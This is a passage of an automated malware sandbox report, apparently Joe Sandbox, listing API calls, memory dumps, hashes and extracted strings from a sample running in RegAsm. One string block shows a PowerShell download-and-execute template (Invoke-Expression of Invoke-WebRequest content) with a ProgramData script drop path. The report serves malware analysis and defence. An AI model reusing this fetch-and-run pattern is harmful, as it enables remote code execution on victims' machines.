                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409C47
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427C9C), ref: 00409C56
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409C69
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427CA0), ref: 00409C78
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00409C8B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427CA4), ref: 00409C9A
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00409D10
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00409D1F
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00409D78
                                                                                                                                                                                                                                          • Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0145F630,?,00000000,?), ref: 004100FA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocProcessSystemTimememset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 248793818-0
                                                                                                                                                                                                                                        • Opcode ID: d2ba082e934dbc401f9ff0b008065b78644ac43cafd502a518f2a1b3700cd46d
                                                                                                                                                                                                                                        • Instruction ID: e4c0f5946711812f302e6db09ae3c8add09daf9cf66fbe5071595f1d653c5d4b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2ba082e934dbc401f9ff0b008065b78644ac43cafd502a518f2a1b3700cd46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D028271800149EBCB14EBE5DC55BEEBB79AF19304F10816EF906B3182DE786A48CB75
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                                                                                                                                                                                                        • API String ID: 0-3918257174
                                                                                                                                                                                                                                        • Opcode ID: 0da743e7f1f19329beac01fcdbede4e9e9511901cf761b3a4091dad53d8bc4d3
                                                                                                                                                                                                                                        • Instruction ID: 55bf40deb3f0fa681d43705a0a7681235eec27fc9a4435402527795b0993a306
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0da743e7f1f19329beac01fcdbede4e9e9511901cf761b3a4091dad53d8bc4d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B5136329003519BC301AF28DC44B5B77A8EF94765F8C4568EC899B6A1D735FD05CBE1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                        • API String ID: 0-2846052723
                                                                                                                                                                                                                                        • Opcode ID: cb2cc203292061899e6b310a8b36bc3497e49177ca4fbaf6ff1191fc0bfd2bf9
                                                                                                                                                                                                                                        • Instruction ID: f6e6c8650003dabb7b165f99c682eac504c30b9d1e1282c30f3408b153128434
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb2cc203292061899e6b310a8b36bc3497e49177ca4fbaf6ff1191fc0bfd2bf9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C417AE5B043D12FF3119A74FC86F673BDAAF41224F1E45ADF8CA565C1DB12A442C262
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004174A0
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461D70), ref: 00413B10
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461DA0), ref: 00413B38
                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00417507
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0145F8A0), ref: 0041752B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01461738), ref: 0041753F
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00417549
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00417557
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
                                                                                                                                                                                                                                        • String ID: %s\%s$pwA
                                                                                                                                                                                                                                        • API String ID: 3642149608-466749030
                                                                                                                                                                                                                                        • Opcode ID: 6560676b729605428f1cf24423b77838af4d11f8f5b0b4b289dcb68fff6e4995
                                                                                                                                                                                                                                        • Instruction ID: 2e90e08b6375851233fbc302e69b98981367c3422ce142ffed233beea235272d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6560676b729605428f1cf24423b77838af4d11f8f5b0b4b289dcb68fff6e4995
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7941BFB5900209ABCB14EFA0CC45FEE7779BF49704F40459EF605A3191DB78AB88CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004174A0
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461D70), ref: 00413B10
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
                                                                                                                                                                                                                                          • Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461DA0), ref: 00413B38
                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00417507
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0145F8A0), ref: 0041752B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01461738), ref: 0041753F
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00417549
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00417557
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
                                                                                                                                                                                                                                        • String ID: %s\%s$pwA
                                                                                                                                                                                                                                        • API String ID: 3642149608-466749030
                                                                                                                                                                                                                                        • Opcode ID: cab40d892b508aeb38e2b70cbecb0b6424e31468c69512105a83fe5c2dda2b1d
                                                                                                                                                                                                                                        • Instruction ID: 924de8276c418feef4113d708d31dfcabf1e1a37831f06c86973242481a33fa5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cab40d892b508aeb38e2b70cbecb0b6424e31468c69512105a83fe5c2dda2b1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2941BEB5900209ABCB10EBA0CC45FEE7779AF49704F40459EF605A3191DB78AB88CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0041388D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                        • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        • API String ID: 2215929589-186952963
                                                                                                                                                                                                                                        • Opcode ID: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
                                                                                                                                                                                                                                        • Instruction ID: fa8f6e43a0c6782230aca54303917860090d0f7f5421da2d4c287f35756e6bbf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2D15E71811249EACB15EBA5D952BDDBBB86F29304F1040AEF50573282DE781B4CCBB9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %Q.$=%Q$PRAGMA
                                                                                                                                                                                                                                        • API String ID: 0-2099833060
                                                                                                                                                                                                                                        • Opcode ID: 7fe7ad7aa460f704cdeaa9fd86ebc4ee5752e32d7555757a245c605dfc29c691
                                                                                                                                                                                                                                        • Instruction ID: 2012255c1a09b419fe92e7a02eab813c0eeaab29a706ea5a879ecabd92c29534
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fe7ad7aa460f704cdeaa9fd86ebc4ee5752e32d7555757a245c605dfc29c691
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5711376A043019BD705EF64FC86B5BB7A4BF84354F0C456DFC899B281D736E9048BA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e5daee564cc167133ce7699ac3f4e60681edc5e2cef18853a4e7448dd51842de
                                                                                                                                                                                                                                        • Instruction ID: 0d7aa181cb7d6eaac404e41f11512681bcc6fe532d327dca8c755a7a3d5d4633
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5daee564cc167133ce7699ac3f4e60681edc5e2cef18853a4e7448dd51842de
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E814676A043829BF7008F20E84172ABFA1BF91200F5C4579E8D6172D6DBB5E945CFDA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CC1B17
                                                                                                                                                                                                                                        • block, xrefs: 19CC1A90
                                                                                                                                                                                                                                        • misuse, xrefs: 19CC1B21
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19CC1B26
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-4016964285
                                                                                                                                                                                                                                        • Opcode ID: 6af168816f00c43ee5ddfd3f27f7672eeff3887f860726015d1bfa977c4e152e
                                                                                                                                                                                                                                        • Instruction ID: f144c7d474df326a23695c43770edf90c3b8269ce405f60cc42f04b8e9875118
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6af168816f00c43ee5ddfd3f27f7672eeff3887f860726015d1bfa977c4e152e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6C1F4B2D00251DFDB12DF26E884A5A7BB4FF84355F088569FC899B391E731DA10CB92
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
